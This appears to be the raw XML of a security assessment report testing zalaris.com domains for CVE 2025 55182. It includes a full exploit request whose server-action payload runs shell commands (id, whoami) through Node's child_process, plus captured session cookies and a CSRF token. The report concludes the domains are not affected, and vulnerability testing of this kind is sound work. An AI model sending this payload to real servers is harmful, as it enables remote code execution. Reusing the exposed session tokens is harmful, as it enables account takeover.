              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51541D59">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t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06E706AE">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"then": "$1:__proto__:then",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B66615F">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"status": "resolved_model",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14A2C886">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"reason": -1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="243AC636">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"value": "{\"then\":\"$B1337\"}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C775CA8">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"_response": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F3C99CA">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"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47B9729D">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"_chunks": "$Q2",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E0A5768">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"_formData": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C2049F0">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"get": "$1:constructor:constructor"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="758CF264">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47CAB761">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4EB24B61">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t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25DDAA50">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------WebKitFormBoundaryGHltqB2YXcxu8kyN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BE27445">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Content-Disposition: form-data; name="1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59810426">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F27842E">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"$@0"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="496419FA">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------WebKitFormBoundaryGHltqB2YXcxu8kyN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="725416CF">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Content-Disposition: form-data; name="2"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C93075A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4DD0D1F9">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t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E08E497">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>------WebKitFormBoundaryGHltqB2YXcxu8kyN--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7017A09D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="641723E9">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="153075F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>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server does not support POST and GET method and allows PUT method </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042BF008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>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Forward the request and analyze the response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B082E05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>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The server responds with 400 Bad request for request with and without authorization Bearer token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA14654">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>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reference </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCF862C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F8867D8">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77B639C9">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6648450" cy="5231765"/>
            <wp:effectExtent l="0" t="0" r="11430" b="1079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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6648450" cy="5231765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33364931">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2D579EAD">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Only GET Request is available and no POST Request was detected, refer screenshot attached below for evidence </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5257FC28">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49B4693C">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50342283">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D98CAB0">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2619B46">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55348D9A">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1091E5E">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6478A41">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42F7639B">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0D03020D">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647180" cy="1740535"/>
            <wp:effectExtent l="0" t="0" r="12700" b="1206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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6647180" cy="1740535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="680015FF">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17371F00">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Test against testportal.zalaris.com </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017A2156">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7D347BFF">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Steps </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B331167">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54D65B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>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Access testportal.zalaris.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CAE292">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>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Look for request or functionality where there is multipart/form-data is available </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B1D822">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>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Tested in the following Tiles </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624B6590">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>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eFile </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EEEFE5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>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My Receipts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321E21BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>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Travel and Expenses receipt page  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2EC3B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>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User Image Upload Function </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4591BA">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5249E10">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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For all the above tiles the multipart/form-data is not available and hence the payload cannot be injected at those request </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E8F3D7">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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0196071F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>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Try to inject the payload via crafted request against the application as unauthenticated user </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC8AFAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>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server responds with 400 Bad Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534F300E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>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Request containing the payload body is given below </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B5FFB4">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left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55C5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shd w:val="clear" w:color="auto" w:fill="CFCECE" w:themeFill="background2" w:themeFillShade="E5"/>
          </w:tcPr>
          <w:p w14:paraId="1088D7E8">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POST / HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02298FE1">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Host: testportal.zalaris.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F65A0F">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Cookie: ai_user=LIXayjAgkk9d1oIU4U+/NC|2025-11-21T05:52:57.461Z; saplb_PORTAL=(J2EE1289120)1289150; sap-webdisp-session=61-5215-qAweSIORXzCgv6VIUeZ3Zw; SAP_SESSIONID_ZEQ_510=Z9RclJKeavGhytlMe9cwPLH7B1PVuBHwgAD2jlNq4zs%3d; CSRF-Session=ba821928c919d077cd9d8d8dfb71d871; sap-usercontext=sap-language=EN&amp;sap-client=510; ai_authUser=510-04000116%7C510; ai_session=cA7dg6+aHkMnQ+qRQUlHgG|1765372192853|1765372617929</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08AF8CEB">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Content-Length: 744</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D669D9C">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Sec-Ch-Ua-Platform: "Windows"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BD44B9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X-Csrf-Token: cDaYd5MRX9SbzmRNUvWCRUZHXBnQWJLLqLkNucnozyU=7036987793115FD49BCE644D52F5824546475C19D058</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0647310D">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Accept-Language: en-US,en;q=0.9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EDA5A6E">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Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A587D01">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Neptunelaunchpad: PORTAL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="281BC687">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Sec-Ch-Ua-Mobile: ?0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B849C9C">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Request-Id: |3c222610ad584215a6aa5e5134e73938.90ea0f3b252e43d1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6954344C">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Traceparent: 00-3c222610ad584215a6aa5e5134e73938-90ea0f3b252e43d1-01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7928D07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Sap-Language: EN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E799662">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X-Requested-With: XMLHttpRequest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="395406FB">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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="670366DB">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Accept: application/json, text/javascript, */*; q=0.01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="775C33A1">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Sap-Client: 510</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CE60C16">
            <w:pPr>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numP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Next-Action: x</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59B6ED66">
            <w:pPr>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numP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X-Nextjs-Request-Id: b5dce965</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F1C9A58">
            <w:pPr>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numP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Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGHltqB2YXcxu8kyN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F387B47">
            <w:pPr>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numP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highlight w:val="yellow"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AB39B58">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Origin: https://helpdesk-dev.zalaris.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EFA7B08">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Sec-Fetch-Site: same-origin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15FE04B2">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Sec-Fetch-Mode: cors</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B4C7E5E">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Sec-Fetch-Dest: empty</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FB20908">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Referer: https://helpdesk-dev.zalaris.com/510/tickets/551942?reload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08303A5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Accept-Encoding: gzip, deflate, br</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61B2B0AA">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Priority: u=1, i</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56BB4884">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Content-Length: 744</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B0D4108">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5C4EA40F">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p w14:paraId="19F1C97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Content-Disposition: form-data; name="0"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B4BB8A1">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0B18D66C">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p w14:paraId="365DCAFB">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"then": "$1:__proto__:then",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CBE78E9">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"status": "resolved_model",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CE528BC">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"reason": -1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14EB724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"value": "{\"then\":\"$B1337\"}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5061B6EB">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"_response": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A71840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"_prefix": "var res=process.mainModule.require('child_process').execSync('whoami',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5643ED3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"_chunks": "$Q2",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71B2B64C">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"_formData": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="470A9AFF">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"get": "$1:constructor:constructor"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DC0C5CA">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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F5F96B1">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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EDB6664">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p w14:paraId="4E3D4F34">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p w14:paraId="05378274">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Content-Disposition: form-data; name="1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B302631">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6272E604">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"$@0"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30105006">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p w14:paraId="06C35164">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Content-Disposition: form-data; name="2"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="110FB643">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48CD2D58">
            <w:pPr>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numP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p w14:paraId="110C9474">
            <w:pPr>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="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------WebKitFormBoundaryGHltqB2YXcxu8kyN--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6659FC18">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left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BFDDDF2">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381E2FF">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response from the server is given below </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6008317C">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FB7C810">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BB93303">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0FE778AD">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6BD5621">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FAEB061">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51C4A3A2">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3B55EAB3">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ECB51E9">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bookmarkStart w:id="8" w:name="_GoBack"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6524625" cy="4743450"/>
            <wp:effectExtent l="0" t="0" r="13335" b="1143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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6524625" cy="4743450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="53D0B2DC">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8898005">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN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4E4F774C">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61882FEF">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03049D69">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1AC2EF06">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654E9C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7BB4F83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911" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F5367D8">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1900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0462EC4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250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07494AAC">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122BC4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41CBFAD7">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10-12-2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2911" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4131B0EE">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CVE 2025 55182 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43AB407D">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250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4545306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 No action needed the tested domains are not affected by CVE 2025 55182</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A6C5F38">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="336" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="242424"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:bookmarkEnd w:id="5"/>
    <w:p w14:paraId="1617D924">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>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13"/>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1C9CEA70">
        <w:pPr>
          <w:pStyle w:val="15"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="1C9CEA71">
    <w:pPr>
      <w:pStyle w:val="13"/>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F">
    <w:pPr>
      <w:pStyle w:val="13"/>
      <w:spacing w:before="240" w:line="14" w:lineRule="auto"/>
      <w:ind w:left="1191"/>
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264"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75ED1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="83875E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293E489"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D293E489"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="E0356CB3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E0356CB3"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="FC641266"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC64126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4F7CAECF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F7CAE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D83E5B8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6D83E5B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0"/>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E1606D"/>
    <w:rsid w:val="000044F9"/>
    <w:rsid w:val="00044DA9"/>
    <w:rsid w:val="000503CC"/>
    <w:rsid w:val="000511E1"/>
    <w:rsid w:val="000626F3"/>
    <w:rsid w:val="00071A77"/>
    <w:rsid w:val="000868D7"/>
    <w:rsid w:val="000B28EF"/>
    <w:rsid w:val="000F4BA5"/>
    <w:rsid w:val="000F6C97"/>
    <w:rsid w:val="000F7B31"/>
    <w:rsid w:val="00103FEF"/>
    <w:rsid w:val="001052B1"/>
    <w:rsid w:val="00105891"/>
    <w:rsid w:val="00107760"/>
    <w:rsid w:val="00114C5D"/>
    <w:rsid w:val="0011700E"/>
    <w:rsid w:val="001208F9"/>
    <w:rsid w:val="0012615D"/>
    <w:rsid w:val="00141C12"/>
    <w:rsid w:val="00144EB8"/>
    <w:rsid w:val="001450BA"/>
    <w:rsid w:val="0018423B"/>
    <w:rsid w:val="00193255"/>
    <w:rsid w:val="001A13FE"/>
    <w:rsid w:val="001A188F"/>
    <w:rsid w:val="001B4C4D"/>
    <w:rsid w:val="001C015F"/>
    <w:rsid w:val="001C3B1D"/>
    <w:rsid w:val="001E2EE7"/>
    <w:rsid w:val="001E3B0B"/>
    <w:rsid w:val="001E62D5"/>
    <w:rsid w:val="001E7835"/>
    <w:rsid w:val="001F0F42"/>
    <w:rsid w:val="00200F41"/>
    <w:rsid w:val="00204C83"/>
    <w:rsid w:val="00211D9E"/>
    <w:rsid w:val="00222BF1"/>
    <w:rsid w:val="00244C24"/>
    <w:rsid w:val="00246E46"/>
    <w:rsid w:val="00246FE5"/>
    <w:rsid w:val="002516F4"/>
    <w:rsid w:val="00265B3A"/>
    <w:rsid w:val="002715EA"/>
    <w:rsid w:val="00272690"/>
    <w:rsid w:val="0028045E"/>
    <w:rsid w:val="0028763A"/>
    <w:rsid w:val="0029082E"/>
    <w:rsid w:val="002B0392"/>
    <w:rsid w:val="002B7EB9"/>
    <w:rsid w:val="002C28FD"/>
    <w:rsid w:val="002C70D2"/>
    <w:rsid w:val="002D4E53"/>
    <w:rsid w:val="003019E1"/>
    <w:rsid w:val="00304AC0"/>
    <w:rsid w:val="003052EF"/>
    <w:rsid w:val="003570B3"/>
    <w:rsid w:val="00363F8E"/>
    <w:rsid w:val="00364CBA"/>
    <w:rsid w:val="0037181F"/>
    <w:rsid w:val="003735FC"/>
    <w:rsid w:val="00391618"/>
    <w:rsid w:val="00392E0D"/>
    <w:rsid w:val="00394CAB"/>
    <w:rsid w:val="0039532B"/>
    <w:rsid w:val="00397169"/>
    <w:rsid w:val="003A1105"/>
    <w:rsid w:val="003B415C"/>
    <w:rsid w:val="003B54AC"/>
    <w:rsid w:val="003E1FF9"/>
    <w:rsid w:val="003F61B7"/>
    <w:rsid w:val="00414BC9"/>
    <w:rsid w:val="004173FD"/>
    <w:rsid w:val="004418F6"/>
    <w:rsid w:val="00441C47"/>
    <w:rsid w:val="00474F29"/>
    <w:rsid w:val="00476365"/>
    <w:rsid w:val="0047699D"/>
    <w:rsid w:val="004917B3"/>
    <w:rsid w:val="004A56BA"/>
    <w:rsid w:val="004C70EB"/>
    <w:rsid w:val="004E30AC"/>
    <w:rsid w:val="004F1939"/>
    <w:rsid w:val="004F1A49"/>
    <w:rsid w:val="004F54FF"/>
    <w:rsid w:val="00507285"/>
    <w:rsid w:val="00507ECA"/>
    <w:rsid w:val="00523B67"/>
    <w:rsid w:val="00530BAA"/>
    <w:rsid w:val="00543B23"/>
    <w:rsid w:val="00556ABD"/>
    <w:rsid w:val="00562C52"/>
    <w:rsid w:val="00563976"/>
    <w:rsid w:val="00563CC8"/>
    <w:rsid w:val="00566C92"/>
    <w:rsid w:val="005727C4"/>
    <w:rsid w:val="00580555"/>
    <w:rsid w:val="00591ABF"/>
    <w:rsid w:val="00593ADB"/>
    <w:rsid w:val="005B5538"/>
    <w:rsid w:val="005B59F8"/>
    <w:rsid w:val="005B7248"/>
    <w:rsid w:val="005C2D66"/>
    <w:rsid w:val="005C3F18"/>
    <w:rsid w:val="005C4E14"/>
    <w:rsid w:val="005F1C8D"/>
